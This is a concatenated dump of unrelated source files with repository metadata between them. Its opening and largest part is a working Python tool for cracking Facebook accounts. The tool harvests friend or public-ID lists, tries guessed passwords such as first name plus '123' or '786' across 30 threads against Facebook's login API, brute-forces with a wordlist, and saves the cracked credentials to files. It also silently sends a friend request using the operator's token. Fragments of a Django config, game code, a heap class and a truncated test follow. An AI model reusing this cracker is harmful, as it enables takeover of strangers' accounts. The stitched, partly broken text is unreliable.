br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;36;40m[✓] Login Successful...'
os.system('xdg-open https://m.youtube.com/channel/UCpkJt660_upnZRNjnuLFNEA')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;97m[!] There is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;97m[!] Your Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;97mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;97mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;97mThere is no internet connection"
keluar()
os.system("clear")
print logo
print " \033[1;36;40m ╔═════════════════════════════════╗"
print " \033[1;36;40m ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;34;40m[*] ID \033[1;34;40m: "+id+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;34;40m[*] Subs\033[1;34;40m: "+sub+" \033[1;36;40m║"
print " \033[1;36;40m ╚═════════════════════════════════╝"
print "\033[1;32;40m[1] \033[1;33;40m══Start Hack3ing"
print "\033[1;32;40m[2] \033[1;33;40m══Update Mraf2"
print "\033[1;32;40m[0] \033[1;33;40m══Log out"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\033[1;97mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print " \033[1;36;40m●════════════════════════◄►════════════════════════●\n"
os.system('git pull origin master')
raw_input('\n\033[1;97m[ \033[1;97mBack \033[1;97m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;97mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\x1b[1;32;40m[1] \033[1;33;40m══Hack From Friend List"
print "\x1b[1;32;40m[2] \033[1;33;40m══Hack From Public ID"
print "\x1b[1;32;40m[3] \033[1;33;40m══Hack Bruteforce"
print "\x1b[1;32;40m[4] \033[1;33;40m══Hack From File"
print "\x1b[1;32;40m[0] \033[1;33;40m══Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;31;40m>>> \033[1;97m")
if peak =="":
print "\033[1;97mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
jalan('\033[1;97m[✺] Getting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;97m[*] Enter ID : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;31;40m[✺] Name : "+op["name"]
except KeyError:
print"\033[1;97m[✺] ID Not Found!"
raw_input("\n\033[1;97m[\033[1;97mBack\033[1;97m]")
super()
print"\033[1;35;40m[✺] Getting IDs..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
brute()
elif peak =="4":
os.system('clear')
print logo
try:
idlist = raw_input('\033[1;97m[+] \033[1;97mEnter the file name \033[1;97m: \033[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;35;40m[!] \x1b[1;35;40mFile not found'
raw_input('\n\x1b[1;35;40m[ \x1b[1;35;40mExit \x1b[1;35;40m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;97mFill in correctly"
pilih_super()
print "\033[1;36;40m[✺] Total IDs : \033[1;97m"+str(len(id))
jalan('\033[1;34;40m[✺] Please Wait...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;32;40m[✺] Cloning\033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;97m ❈ \033[1;97mTo Stop Process Press CTRL+Z \033[1;97m ❈"
print " \033[1;31;48m●💋══════════════════◄►══════════════════💋●"
jalan(' \033[1;97mMr Af2 start cloning Wait...')
print " \033[1;36;48m ●💋══════════════════◄►══════════════════💋●"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass1 + ' 👽 ' + b['name']
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass1 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass2 + ' 👽 ' + b['name']
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass2 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass3 + ' 👽 ' + b['name']
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass3 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass4 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass4 + ' 👽 ' + b['name']
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass4 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass5 + ' 👽 ' + b['name']
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass5 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass6 + ' 👽 ' + b['name']
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass6 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = 'Afghanistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass7 + ' 👽 ' + b['name']
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass7 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;31;40m[✓] Process Has Been Completed\033[1;97m....'
print "\033[1;32;40m[+] Total OK/\033[1;97mCP \033[1;97m: \033[1;97m"+str(len(oks))+"\033[1;31;40m/\033[1;36;40m"+str(len(cekpoint))
print '\033[1;34;40m[+] CP File Has Been Saved : save/cp.txt'
print """
\033[1;31;40m ●════════════════════════◄►════════════════════════●
"""
raw_input("\n\033[1;97m[\033[1;97mExit\033[1;97m]")
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\033[1;97m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
try:
email = raw_input('\033[1;97m[+] \033[1;97mID\033[1;97m/\033[1;97mEmail \033[1;97mTarget \033[1;97m:\033[1;97m ')
passw = raw_input('\033[1;97m[+] \033[1;97mWordlist \033[1;97mext(list.txt) \033[1;97m: \033[1;97m')
total = open(passw, 'r')
total = total.readlines()
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
print '\033[1;97m[\033[1;97m\xe2\x9c\x93\033[1;97m] \033[1;97mTarget \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[+] \033[1;97mTotal\033[1;97m ' + str(len(total)) + ' \033[1;97mPassword'
jalan('\033[1;97m[\xe2\x9c\xba] \033[1;97mPlease wait \033[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\033[1;97m[\033[1;97m\xe2\x9c\xb8\033[1;97m] \033[1;97mTry \033[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\033[1;97m[+] \033[1;97mFounded.'
print 52 * '\033[1;97m\xe2\x95\x90'
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mUsername \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mPassword \033[1;97m:\033[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\033[1;97m[+] \033[1;97mFounded.'
print "\033[1;36;40m ●════════════════════════◄►════════════════════════●"
print '\033[1;97m[!] \033[1;97mAccount Maybe Checkpoint'
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mUsername \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mPassword \033[1;97m:\033[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\033[1;97m[!] Connection Error'
time.sleep(1)
except IOError:
print '\033[1;97m[!] File not found...'
print """\n\033[1;97m[!] \033[1;97mLooks like you don't have a wordlist"""
super()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
darshankhakhodiya143.noreply@github.com
|
57c4abb61863b4e306c8d7e7968366cef774dbdd
|
9b2b3ce5a94e5559c49991f4b3e7112a3ea39ebc
|
/schoolcms/wsgi.py
|
a42cdd7ea70c3f0be8f22a615842e8fe5ea81098
|
[] |
no_license
|
suryakumar1024/schoolcms
|
7394d7c1587c5559b22906db96ff55f7969391a2
|
b377ff5b80b4d6b6641d3ccfb040459712e2facf
|
refs/heads/master
| 2021-05-03T14:53:16.850483
| 2019-03-04T11:28:15
| 2019-03-04T11:28:15
| 69,850,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
WSGI config for schoolcms project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "schoolcms.settings")
application = get_wsgi_application()
|
[
"suryak22@outlook.com"
] |
suryak22@outlook.com
|
c2b8a7ff84cbf75a213e37f6530789404d4e359d
|
7905c69a89842486eaebe97911b020d49567e3c1
|
/test/test_idecanarias_dockwidget.py
|
a929e5f6b22118268884e842d41d16c33c9476f4
|
[] |
no_license
|
fherdom/IDECanarias3
|
662e0eb0f0850e7d2c670e41c1c5caa864425bc3
|
7f3e5b6a8a61d343f428fa9f054a5cf03437bdef
|
refs/heads/master
| 2021-04-26T22:13:32.061017
| 2020-02-06T13:59:07
| 2020-02-06T13:59:07
| 124,045,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,134
|
py
|
# coding=utf-8
"""DockWidget test.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'fhernandeze@grafcan.com'
__date__ = '2018-03-06'
__copyright__ = 'Copyright 2018, Félix José Hernández'
import unittest
from PyQt5.QtGui import QDockWidget
from idecanarias_dockwidget import IDECanariasDockWidget
from utilities import get_qgis_app
QGIS_APP = get_qgis_app()
class IDECanariasDockWidgetTest(unittest.TestCase):
"""Test dockwidget works."""
def setUp(self):
"""Runs before each test."""
self.dockwidget = IDECanariasDockWidget(None)
def tearDown(self):
"""Runs after each test."""
self.dockwidget = None
def test_dockwidget_ok(self):
"""Test we can click OK."""
pass
if __name__ == "__main__":
suite = unittest.makeSuite(IDECanariasDialogTest)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
|
[
"felix@Felix.grafcan.tfe"
] |
felix@Felix.grafcan.tfe
|
584dc20b3ad651e22fc34eba3c0edc1f48eef89e
|
e6f3c3d67183497c044b6ae2cfc389a56d65a9ff
|
/extra/pygame/8-python-pygame-exercise-files/Game/Scenes/HighscoreScene.py
|
1a845dd4bb4b5e7d70ace251b3bc8e5089f17d0f
|
[] |
no_license
|
univdig/python-training
|
e9e2da35c77a49af4c0bf9153b70029d5a7ca31b
|
72e00806ab3c05f64a97c1eb6fc42026bbf33ebe
|
refs/heads/master
| 2021-01-16T22:17:00.621488
| 2016-03-10T21:03:34
| 2016-03-10T21:03:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,219
|
py
|
import pygame
from Game.Scenes.Scene import Scene
from Game import Highscore
from Game.Shared import *
class HighscoreScene(Scene):
def __init__(self, game):
super(HighscoreScene, self).__init__(game)
self.__highscoreSprite = pygame.image.load(GameConstants.SPRITE_HIGHSCORE)
def render(self):
self.getGame().screen.blit(self.__highscoreSprite, (50, 50))
self.clearText()
highscore = Highscore()
x = 350
y = 100
for score in highscore.getScores():
self.addText(score[0], x, y, size = 30)
self.addText(str(score[1]), x + 200, y, size = 30)
y += 30
self.addText("Press F1 to start a new game", x, y + 60, size = 30)
super(HighscoreScene, self).render()
def handleEvents(self, events):
super(HighscoreScene, self).handleEvents(events)
for event in events:
if event.type == pygame.QUIT:
exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_F1:
self.getGame().reset()
self.getGame().changeScene(GameConstants.PLAYING_SCENE)
|
[
"gabriel.briones.sayeg@intel.com"
] |
gabriel.briones.sayeg@intel.com
|
e7b57f0e9b8501259408dbc1c7b7851fa4e565a3
|
6013064c1220fea2d1e40faa9a17e5df10640a0b
|
/scrapers/lider/simple/extractors.py
|
6b94a296fc8b7376faf1de45101fd399859bb817
|
[] |
no_license
|
4chirinos/scraper
|
e5ece303378e35bfa86f831ebd48e6d1b04eb320
|
a7eb3988a28bf8d91ce74a51e50956b0b5ce3e34
|
refs/heads/master
| 2020-05-20T19:33:57.389107
| 2020-04-07T16:07:14
| 2020-04-07T16:07:14
| 185,725,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 678
|
py
|
from .models import ProductInformation
def extract_products(data):
return data['hits']
def extract_product_information(product):
if is_product_active(product):
name = product['name']
sku = product['sku']
measure = product['uom']
price = get_price(product)
return ProductInformation(name, sku, price, measure)
return None
def get_price(product):
first_store = list(product['stores'].keys())[0]
store = product['stores'][first_store]
return store['prices']['sale']
def is_product_active(product):
for store_id in list(product['stores'].keys()):
store = product['stores'][store_id]
if store['enabled']:
return True
return False
|
[
"Argenis_Chirinos@gap.com"
] |
Argenis_Chirinos@gap.com
|
d32d2d0ba843d841278be8b3f5679efdb92e44f7
|
3961f9f14a2e3ae9806176290a89a1c679612373
|
/docs/report/fa20-523-349/project/RankNet/indycar/simulator.py
|
e1cb108341de6cbf64fdcefd2585934d1d0490fc
|
[
"Apache-2.0"
] |
permissive
|
mikahla1/cybertraining-dsc.github.io
|
c97026096dd36d3fa129c8068b9c1b35ae1617a3
|
168cadb2f755cb6ad4907e5656bd879d57e01e43
|
refs/heads/main
| 2023-06-10T18:11:53.925182
| 2021-06-30T18:41:43
| 2021-06-30T18:41:43
| 382,053,310
| 0
| 0
|
Apache-2.0
| 2021-07-01T14:05:43
| 2021-07-01T14:05:42
| null |
UTF-8
|
Python
| false
| false
| 1,765
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
IndyCar Simulator
laptime = ForcastedTime + FuelAdj + Random
pitstop :
pit window, 10 laps
in lap penalty
pit time
out lap penalty
"""
import sys,os,re
import datetime
import random
import numpy as np
import logging
from optparse import OptionParser
logger = logging.getLogger(__name__)
class IndySimulator():
"""
"""
def __init__(self):
pass
def load_config(self, configfile):
pass
def run(self):
if __name__=="__main__":
program = os.path.basename(sys.argv[0])
logger = logging.getLogger(program)
# logging configure
import logging.config
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')
logging.root.setLevel(level=logging.DEBUG)
logger.info("running %s" % ' '.join(sys.argv))
# cmd argument parser
usage = 'nabcsv.py --threshold threshold --input inputfile --output outputfile'
parser = OptionParser(usage)
parser.add_option("--input", dest="inputfile")
parser.add_option("--output", dest="outputfile")
parser.add_option("--threshold", type=float, dest="threshold")
parser.add_option("--flagfile", default="")
parser.add_option("--cmd", dest="cmd", default='score')
opt, args = parser.parse_args()
if opt.inputfile is None:
logger.error(globals()['__doc__'] % locals())
sys.exit(1)
if opt.cmd == 'score':
convert_score(opt.inputfile, opt.outputfile, opt.threshold)
elif opt.cmd == 'flag':
convert_flag(opt.inputfile, opt.outputfile)
elif opt.cmd == 'prune':
prune(opt.inputfile, opt.flagfile,opt.outputfile)
elif opt.cmd == 'confuse':
convert_confuse(opt.inputfile, opt.outputfile)
|
[
"laszewski@gmail.com"
] |
laszewski@gmail.com
|
f7cc021e0089997b48a7c793ecc398ccb729e89d
|
a7ec33c7defd493f2bb6e7dbbbb338ce47fbfd8c
|
/tree_and_tree_algorithms/minimum_binary_heap.py
|
635daec29c0bdf0a60c9dd94268a380ae1af44c8
|
[
"MIT"
] |
permissive
|
arvinsim/data-structures-and-algorithms-implementation
|
85871647c87e0d0dad3910ebff28d73321708774
|
5f15d48243e08bf20099a0c7e807278ed24ce269
|
refs/heads/master
| 2021-01-23T06:49:51.753007
| 2017-03-30T01:27:26
| 2017-03-30T01:27:26
| 86,403,339
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,164
|
py
|
class BinaryHeap:
"""
BinaryHeap() creates a new, empty, binary heap.
This is the minimum heap version
"""
def __init__(self):
self.heapList = []
self.currentSize = 0
def get_left_child_index(self, parent_index):
return (parent_index * 2) + 1
def get_right_child_index(self, parent_index):
return (parent_index * 2) + 2
def get_parent_index(self, child_index):
return (child_index - 1) // 2
def has_left_child(self, index):
return self.get_left_child_index(index) < self.currentSize
def has_right_child(self, index):
return self.get_right_child_index(index) < self.currentSize
def has_parent(self, index):
return self.get_parent_index(index) >= size
def left_child(self, index):
return self.heapList[self.get_left_child_index(index)]
def right_child(self, index):
return self.heapList[self.get_right_child_index(index)]
def parent(self):
return self.heapList[self.get_parent_index(index)]
def swap(self, i, j):
"""
Swap items
"""
self.heapList[i], self.heapList[j] = self.heapList[j], self.heapList[i]
def heapify_up(self, i):
"""
Swap values up until the parent is lesser than the inserted value
"""
while i // 2 > 0:
# Swap if parent is greater than child
if self.heapList[i] < self.heapList[self.get_parent_index(i)]:
self.swap(i, self.get_parent_index(i))
i = i // 2
def heapify_down(self):
index = 0
# Insert the last element into the first index
while self.has_left_child(index):
# set the smaller child
smaller_child_index = self.get_left_child_index(index)
if self.has_right_child(index) and self.right_child(index) < self.left_child(index):
smaller_child_index = self.get_right_child_index(index)
# If smaller child index item is less than current index item, stop
if self.heapList[index] < self.heapList[smaller_child_index]:
break
else:
self.swap(index, smaller_child_index)
index = smaller_child_index
def insert(self, k):
"""
insert(k) adds a new item to the heap.
"""
self.heapList.append(k)
self.currentSize = self.currentSize + 1
self.heapify_up(self.currentSize-1)
def peek(self, k):
"""
Returns the item with the minimum key value, leaving item in the heap.
"""
return self.heapList[0]
def poll(self):
"""
returns the item with the minimum key value, removing the item from the heap.
"""
item = self.heapList[0]
self.heapList[0] = self.heapList.pop()
self.currentSize -= 1
self.heapify_down()
return item
if __name__ == '__main__':
bh = BinaryHeap()
bh.insert(10)
bh.insert(15)
bh.insert(20)
bh.insert(17)
bh.insert(25)
print(bh.heapList)
print('Do poll. Item: ', bh.poll())
print(bh.heapList)
|
[
"developarvin@gmail.com"
] |
developarvin@gmail.com
|
e275b3cff26f83c7f3121b0cd98bec47ae460836
|
aa508e822a84fde8ee8ce2a6342a2e5da946cb43
|
/src/view/finder/lookup.py
|
6abad178573092a73646919897cad1189abe8ec4
|
[
"Apache-2.0"
] |
permissive
|
gustavosaquetta/FrameworkSSQt-Vocatus
|
a4ea093f05aa4d503ca86603312198aa869675ec
|
485dc401e05859f68fe198aa2106675839585a13
|
refs/heads/master
| 2020-04-14T19:01:07.349185
| 2019-01-04T01:31:23
| 2019-01-04T01:31:23
| 164,041,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 946
|
py
|
import platform, sys, os
sys.path.append(os.getcwd())
from PyQt5 import uic
from PyQt5.QtWidgets import *
from PyQt5 import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from sources.dialog.finddialog import DialogFindCliente
def lookup_cliente(parent):
LC = LookupCliente(parent)
LC.exec_()
class LookupCliente(DialogFindCliente):
def __init__(self, parent):
from controller.cliente import ClienteController
campos = ['Nome', 'Código']
super(LookupCliente, self).__init__(cb_campo_list=campos, classe=ClienteController)
self.setWindowTitle('Localizar Cliente')
self.parent = parent
def prepare_view(self, parent):
parent.grupo.setProperty('id', int(self.ret.get('id')))
parent.grupo.setProperty('title', self.ret.get('nome'))
parent.grupo_codigo.setProperty('text', self.ret.get('codigo'))
if __name__ == "__main__":
appcl = QApplication(sys.argv)
w = LookupCliente()
w.main()
sys.exit(appcl.exec_())
|
[
"gustavosaquetta@gmail.com"
] |
gustavosaquetta@gmail.com
|
4848f0665aac256b274f1b523e25452b01fe47cd
|
747e83c2624fd9bcd8a44b293c54d10672965fcd
|
/venv/bin/f2py
|
77d06710d00d5aae0389fff94fbd588f27919504
|
[] |
no_license
|
al11588/MLTut
|
430b2b40aeddf616b3bc860a7b65189c1339d2f4
|
e1b320178b33b6192f7542f305b544047062f1cf
|
refs/heads/master
| 2016-09-14T08:21:13.815887
| 2016-05-03T16:21:02
| 2016-05-03T16:21:02
| 57,983,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 790
|
#!/Users/alvinlawson/Desktop/MLTut/venv/bin/python
# See http://cens.ioc.ee/projects/f2py2e/
from __future__ import division, print_function
import os
import sys
for mode in ["g3-numpy", "2e-numeric", "2e-numarray", "2e-numpy"]:
try:
i = sys.argv.index("--" + mode)
del sys.argv[i]
break
except ValueError:
pass
os.environ["NO_SCIPY_IMPORT"] = "f2py"
if mode == "g3-numpy":
sys.stderr.write("G3 f2py support is not implemented, yet.\\n")
sys.exit(1)
elif mode == "2e-numeric":
from f2py2e import main
elif mode == "2e-numarray":
sys.argv.append("-DNUMARRAY")
from f2py2e import main
elif mode == "2e-numpy":
from numpy.f2py import main
else:
sys.stderr.write("Unknown mode: " + repr(mode) + "\\n")
sys.exit(1)
main()
|
[
"al11588@gmail.com"
] |
al11588@gmail.com
|
|
f6a8c9e639d06784cd89ac6597e1506e0d2a561a
|
869f3cc7c4b5c0c0b138c76cf457ebc5f7a35525
|
/tests/v1/test_redflag_view.py
|
40535fe7e06bda81f7f7c7400950171c925cc5fc
|
[
"MIT"
] |
permissive
|
Curti-s/ireporter-api
|
dc3c1dea0373243c0035e8d5200c0a33bc106ab5
|
57b225508f58fd33c848bc480a6dd5b7a5ea5790
|
refs/heads/develop
| 2022-12-10T11:24:10.653374
| 2018-12-08T15:42:01
| 2018-12-08T15:42:01
| 158,517,000
| 2
| 0
| null | 2022-12-08T01:27:49
| 2018-11-21T08:41:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
import unittest
import datetime
import uuid
from flask import request, json
from rapidjson import dump, dumps, loads, load, DM_ISO8601, UM_CANONICAL
from app import create_app
from app.v1.models.red_flag_model import RedFlagModel
class TestRedFlagView(unittest.TestCase):
"""Test RedFlagView api"""
def setUp(self):
self.app = create_app('testing')
self.client = self.app.test_client
self.red_flag_data = dict(
id = uuid.uuid4(),
created_on = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),
created_by = "curtis",
record_type = "red flag",
location = '0.0236° S, 37.9062° E',
status = "New red flag",
image = " ",
video = " ",
